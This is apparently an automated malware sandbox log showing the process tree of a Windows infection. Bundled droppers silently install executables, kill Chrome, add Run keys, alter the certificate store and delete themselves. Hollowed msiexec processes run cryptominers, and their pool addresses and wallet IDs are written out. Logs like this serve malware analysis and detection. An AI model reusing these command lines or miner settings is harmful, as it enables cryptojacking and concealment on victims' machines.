C:\Users\Admin\AppData\Local\Temp\is-LDGI4.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-LDGI4.tmp\vpn.tmp" /SL5="$20354,15170975,270336,C:\Users\Admin\AppData\Local\Temp\nroabrjde41\vpn.exe" /silent /subid=4829⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5840 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:2128
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:5696
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:3384
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:3256
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\HA0CJ9ZZ2V\setups.exe"C:\Users\Admin\AppData\Local\Temp\HA0CJ9ZZ2V\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Users\Admin\AppData\Local\Temp\is-F0885.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-F0885.tmp\setups.tmp" /SL5="$301FC,454998,229376,C:\Users\Admin\AppData\Local\Temp\HA0CJ9ZZ2V\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:216
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4308 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:812
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full_Version.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full_Version.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:232
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2264 -
C:\Users\Admin\AppData\Roaming\D8F1.tmp.exe"C:\Users\Admin\AppData\Roaming\D8F1.tmp.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:1912 -
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w4528 --cpu-max-threads-hint 50 -r 99996⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:3740
-
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w10244@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:708
-
-
-
C:\Users\Admin\AppData\Roaming\DBC0.tmp.exe"C:\Users\Admin\AppData\Roaming\DBC0.tmp.exe"5⤵
- Executes dropped EXE
PID:2668 -
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\DBC0.tmp.exe6⤵PID:6036
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:3048
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵PID:2404
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:5744
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:2208
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"4⤵PID:6544
-
C:\ProgramData\7005859.exe"C:\ProgramData\7005859.exe"5⤵PID:6804
-
-
C:\ProgramData\7476647.exe"C:\ProgramData\7476647.exe"5⤵
- Adds Run key to start application
PID:4616 -
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵PID:6868
-
-
-
C:\ProgramData\3905871.exe"C:\ProgramData\3905871.exe"5⤵PID:6344
-
C:\ProgramData\3905871.exe"{path}"6⤵PID:6352
-
-
-
C:\ProgramData\3406086.exe"C:\ProgramData\3406086.exe"5⤵PID:6168
-
-
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4840 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:5056
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4176
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:3496
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4296
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4468
-
C:\Users\Admin\AppData\Local\Temp\is-PBAD9.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-PBAD9.tmp\Setup3310.tmp" /SL5="$4027E,138429,56832,C:\Users\Admin\AppData\Local\Temp\5nrnfjanddr\Setup3310.exe" /Verysilent /subid=5771⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5216 -
C:\Users\Admin\AppData\Local\Temp\is-NLQTA.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-NLQTA.tmp\Setup.exe" /Verysilent2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:3524 -
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4512 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4380
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5188
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4664 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 9324⤵
- Program crash
PID:6436
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 10044⤵
- Program crash
PID:2584
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 10164⤵
- Program crash
PID:4464
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 11444⤵
- Program crash
PID:6660
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 11604⤵
- Program crash
PID:6292
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 11924⤵
- Program crash
PID:5920
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 15204⤵
- Program crash
PID:3120
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 16084⤵
- Program crash
PID:5172
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:3592
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5388 -
C:\Users\Admin\AppData\Local\Temp\is-4KF3I.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-4KF3I.tmp\LabPicV3.tmp" /SL5="$2031E,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:3116 -
C:\Users\Admin\AppData\Local\Temp\is-0LPR3.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-0LPR3.tmp\ppppppfy.exe" /S /UID=lab2145⤵PID:2452
-
C:\Users\Admin\AppData\Local\Temp\e5-78e63-2fb-c99a7-c414cc19e3f65\Valyshivase.exe"C:\Users\Admin\AppData\Local\Temp\e5-78e63-2fb-c99a7-c414cc19e3f65\Valyshivase.exe"6⤵PID:4612
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 19487⤵PID:7164
-
-
-
C:\Users\Admin\AppData\Local\Temp\7c-d97b7-bed-92998-d5123c67c2ecc\Xudyfobejae.exe"C:\Users\Admin\AppData\Local\Temp\7c-d97b7-bed-92998-d5123c67c2ecc\Xudyfobejae.exe"6⤵PID:4056
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\isjc5mnm.f5e\md6_6ydj.exe & exit7⤵PID:2092
-
C:\Users\Admin\AppData\Local\Temp\isjc5mnm.f5e\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\isjc5mnm.f5e\md6_6ydj.exe8⤵
- Suspicious use of SetWindowsHookEx
PID:5884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b2gzegq4.4tu\askinstall31.exe & exit7⤵PID:5972
-
C:\Users\Admin\AppData\Local\Temp\b2gzegq4.4tu\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\b2gzegq4.4tu\askinstall31.exe8⤵
- Suspicious use of SetWindowsHookEx
PID:6508 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:1572
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:7108
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yem5tuoi.bo3\toolspab1.exe & exit7⤵PID:6200
-
C:\Users\Admin\AppData\Local\Temp\yem5tuoi.bo3\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\yem5tuoi.bo3\toolspab1.exe8⤵
- Suspicious use of SetThreadContext
PID:6420 -
C:\Users\Admin\AppData\Local\Temp\yem5tuoi.bo3\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\yem5tuoi.bo3\toolspab1.exe9⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1864
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xxej51bs.vj0\GcleanerWW.exe /mixone & exit7⤵PID:5964
-
-
-
C:\Program Files\Microsoft Office\AXQILRKWTC\prolab.exe"C:\Program Files\Microsoft Office\AXQILRKWTC\prolab.exe" /VERYSILENT6⤵
- Suspicious use of SetWindowsHookEx
PID:3404 -
C:\Users\Admin\AppData\Local\Temp\is-AI9VU.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-AI9VU.tmp\prolab.tmp" /SL5="$2030A,575243,216576,C:\Program Files\Microsoft Office\AXQILRKWTC\prolab.exe" /VERYSILENT7⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5832
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5364 -
C:\Users\Admin\AppData\Local\Temp\is-SNL9J.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-SNL9J.tmp\lylal220.tmp" /SL5="$50310,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:5244 -
C:\Users\Admin\AppData\Local\Temp\is-PPH19.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-PPH19.tmp\Microsoft.exe" /S /UID=lylal2205⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:744 -
C:\Program Files\Microsoft Office\MASYZAAIFV\irecord.exe"C:\Program Files\Microsoft Office\MASYZAAIFV\irecord.exe" /VERYSILENT6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5384 -
C:\Users\Admin\AppData\Local\Temp\is-68664.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-68664.tmp\irecord.tmp" /SL5="$9040E,6265333,408064,C:\Program Files\Microsoft Office\MASYZAAIFV\irecord.exe" /VERYSILENT7⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4300
-
-
-
C:\Users\Admin\AppData\Local\Temp\81-c73f1-4ad-47780-0b03de94867cc\Xyqupovabu.exe"C:\Users\Admin\AppData\Local\Temp\81-c73f1-4ad-47780-0b03de94867cc\Xyqupovabu.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
PID:532 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iibflyxn.v4h\md6_6ydj.exe & exit7⤵PID:3428
-
C:\Users\Admin\AppData\Local\Temp\iibflyxn.v4h\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\iibflyxn.v4h\md6_6ydj.exe8⤵
- Suspicious use of SetWindowsHookEx
PID:4076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\15lyg1zi.kvk\askinstall31.exe & exit7⤵PID:3348
-
C:\Users\Admin\AppData\Local\Temp\15lyg1zi.kvk\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\15lyg1zi.kvk\askinstall31.exe8⤵
- Suspicious use of SetWindowsHookEx
PID:204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wmxmhksw.ywk\toolspab1.exe & exit7⤵PID:6756
-
C:\Users\Admin\AppData\Local\Temp\wmxmhksw.ywk\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\wmxmhksw.ywk\toolspab1.exe8⤵
- Suspicious use of SetThreadContext
PID:5268 -
C:\Users\Admin\AppData\Local\Temp\wmxmhksw.ywk\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\wmxmhksw.ywk\toolspab1.exe9⤵PID:6524
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cmonjyf0.xzf\GcleanerWW.exe /mixone & exit7⤵PID:2072
-
-
-
C:\Users\Admin\AppData\Local\Temp\fa-91db3-12d-879a6-6c85d90425e24\Punyrazhewy.exe"C:\Users\Admin\AppData\Local\Temp\fa-91db3-12d-879a6-6c85d90425e24\Punyrazhewy.exe"6⤵
- Executes dropped EXE
PID:776 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 24287⤵
- Suspicious use of SetWindowsHookEx
PID:3056
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5440 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"4⤵PID:6044
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install5⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:6096
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"3⤵
- Executes dropped EXE
PID:5544
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"3⤵
- Executes dropped EXE
PID:4504 -
C:\Users\Admin\AppData\Local\Temp\WHCYBEXA3M\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\WHCYBEXA3M\multitimer.exe" 0 306065bb10421b26.04333812 0 1034⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:3392 -
C:\Users\Admin\AppData\Local\Temp\WHCYBEXA3M\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\WHCYBEXA3M\multitimer.exe" 1 3.1617560687.606a046f31bfb 1035⤵
- Executes dropped EXE
- Adds Run key to start application
PID:6128 -
C:\Users\Admin\AppData\Local\Temp\WHCYBEXA3M\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\WHCYBEXA3M\multitimer.exe" 2 3.1617560687.606a046f31bfb6⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
PID:4432 -
C:\Users\Admin\AppData\Local\Temp\kxa0vc11zmb\oy4rxs43c1h.exe"C:\Users\Admin\AppData\Local\Temp\kxa0vc11zmb\oy4rxs43c1h.exe" /ustwo INSTALL7⤵PID:6412
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "oy4rxs43c1h.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\kxa0vc11zmb\oy4rxs43c1h.exe" & exit8⤵PID:3872
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "oy4rxs43c1h.exe" /f9⤵
- Kills process with taskkill
PID:5176
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\zg5fbrmhnkx\app.exe"C:\Users\Admin\AppData\Local\Temp\zg5fbrmhnkx\app.exe" /8-237⤵PID:6440
-
-
C:\Users\Admin\AppData\Local\Temp\ebipyizeovh\vict.exe"C:\Users\Admin\AppData\Local\Temp\ebipyizeovh\vict.exe" /VERYSILENT /id=5357⤵
- Suspicious use of SetWindowsHookEx
PID:6428 -
C:\Users\Admin\AppData\Local\Temp\is-64V57.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-64V57.tmp\vict.tmp" /SL5="$2036C,870426,780800,C:\Users\Admin\AppData\Local\Temp\ebipyizeovh\vict.exe" /VERYSILENT /id=5358⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:6628 -
C:\Users\Admin\AppData\Local\Temp\is-2K7TU.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-2K7TU.tmp\win1host.exe" 5359⤵
- Suspicious use of SetWindowsHookEx
PID:6048
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\stfegfmhj2g\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\stfegfmhj2g\cpyrix.exe" /VERYSILENT7⤵
- Suspicious use of SetWindowsHookEx
PID:6404 -
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe8⤵PID:540
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"9⤵PID:5708
-
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"9⤵PID:6716
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe8⤵PID:6968
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"9⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:2452
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jgvlyw5rqym\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\jgvlyw5rqym\Setup3310.exe" /Verysilent /subid=5777⤵
- Suspicious use of SetWindowsHookEx
PID:6568 -
C:\Users\Admin\AppData\Local\Temp\is-41TA5.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-41TA5.tmp\Setup3310.tmp" /SL5="$2033A,138429,56832,C:\Users\Admin\AppData\Local\Temp\jgvlyw5rqym\Setup3310.exe" /Verysilent /subid=5778⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:6700 -
C:\Users\Admin\AppData\Local\Temp\is-3Q4AC.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-3Q4AC.tmp\Setup.exe" /Verysilent9⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:6904
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3pydxon113o\vpn.exe"C:\Users\Admin\AppData\Local\Temp\3pydxon113o\vpn.exe" /silent /subid=4827⤵
- Suspicious use of SetWindowsHookEx
PID:324 -
C:\Users\Admin\AppData\Local\Temp\is-P3RN0.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-P3RN0.tmp\vpn.tmp" /SL5="$4028E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\3pydxon113o\vpn.exe" /silent /subid=4828⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:6908
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\QXH4IG3QEL\setups.exe"C:\Users\Admin\AppData\Local\Temp\QXH4IG3QEL\setups.exe" ll4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5296 -
C:\Users\Admin\AppData\Local\Temp\is-R8LDC.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-R8LDC.tmp\setups.tmp" /SL5="$502E6,454998,229376,C:\Users\Admin\AppData\Local\Temp\QXH4IG3QEL\setups.exe" ll5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:972
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\0Jm5LQEyZe9W.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\0Jm5LQEyZe9W.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5716 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe4⤵PID:4044
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5484 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"4⤵PID:6028
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install5⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3352
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-473TJ.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-473TJ.tmp\vict.tmp" /SL5="$202A2,870426,780800,C:\Users\Admin\AppData\Local\Temp\cr201y5ywfk\vict.exe" /VERYSILENT /id=5351⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5264 -
C:\Users\Admin\AppData\Local\Temp\is-EE8FI.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-EE8FI.tmp\win1host.exe" 5352⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5856 -
C:\Users\Admin\AppData\Local\Temp\JH7h9IA8j.exe"C:\Users\Admin\AppData\Local\Temp\JH7h9IA8j.exe"3⤵PID:6160
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:412 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8EA2C4786A7ED7EA585E80EDE48084F9 C2⤵
- Loads dropped DLL
PID:4692
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 6B1D634CEA1385D8C5202E26BD1F7BC52⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:884
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵PID:6996
-
-
